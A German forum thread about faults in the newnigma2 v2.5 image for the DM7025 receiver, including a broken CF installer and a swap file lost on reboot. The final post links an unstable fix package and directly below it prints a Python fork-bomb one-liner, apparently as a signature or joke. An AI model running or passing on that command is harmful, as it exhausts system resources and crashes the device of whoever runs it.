newnigma2-release-DM7025-v2.5

• IOError: [Errno 28] No space left on device: '/etc/enigma2/profile'

da muste aber noch was installiert haben :D
      » time to say goodbye «

Konfuzius sagt:
      Erst wenn eine Mücke auf deinen Hoden landet wirst du lernen Probleme ohne Gewalt zu lösen.
    • nee nichts nur das image ganz frisch das ja das was ich nicht verstehe
      Posting © [OdinZ] 2008. Alle Rechte vorbehalten. Kein Verwenden, Zitieren und Kritisieren ohne Erlaubnis. =)
    • CF-Installer geht nicht und Swap-File muß nach jedem Neustart neu angelegt werden ....
      Lt. Kumpel mit ner 800er funzt das Image einwandfrei , bei mir auf der 7025 ist es zumindest das schlechteste Newnigma . Hat eigentlich jemand von den Devs noch ne 7025 und wieso fallen solche gravierenden Mängel nicht auf ?
      Kann alles , weiß alles und mache alles :pleased2:
    • Hallo Jungs,

weil ich mehrere Wochen ohne Internet auskommen musste,bin ich leider nicht so richtig auf dem neusten Stand.Erstenst freut es mich daß es wieder mal ein neues Image gibt.Aber bevor ich es aber aufspiele könnte mir jemad ein Tipp geben,ob zB.die Probleme mit dem CF-Installer behoben worden sind ? Möchte mir einfach ne böse Überaschung ersparen.

gruß fenjal

Original von Kartenzwerg7
      CF-Installer geht nicht und Swap-File muß nach jedem Neustart neu angelegt werden ....
      Lt. Kumpel mit ner 800er funzt das Image einwandfrei , bei mir auf der 7025 ist es zumindest das schlechteste Newnigma . Hat eigentlich jemand von den Devs noch ne 7025 und wieso fallen solche gravierenden Mängel nicht auf ?

Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von fenjal ()

• na gott sei dank haben auch andere das prob mit dem CF Installer
      Posting © [OdinZ] 2008. Alle Rechte vorbehalten. Kein Verwenden, Zitieren und Kritisieren ohne Erlaubnis. =)
    • Original von Kartenzwerg7
      CF-Installer geht nicht und Swap-File muß nach jedem Neustart neu angelegt werden ....

Ich hab bereits gesagt das der mit dem nächsten update vbehoben wird aber wenn ihr garnet warten könnt.
      Installiert den hier feed.newnigma2.to/unstable/dm7…svn20090528-r1_mipsel.ipk
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !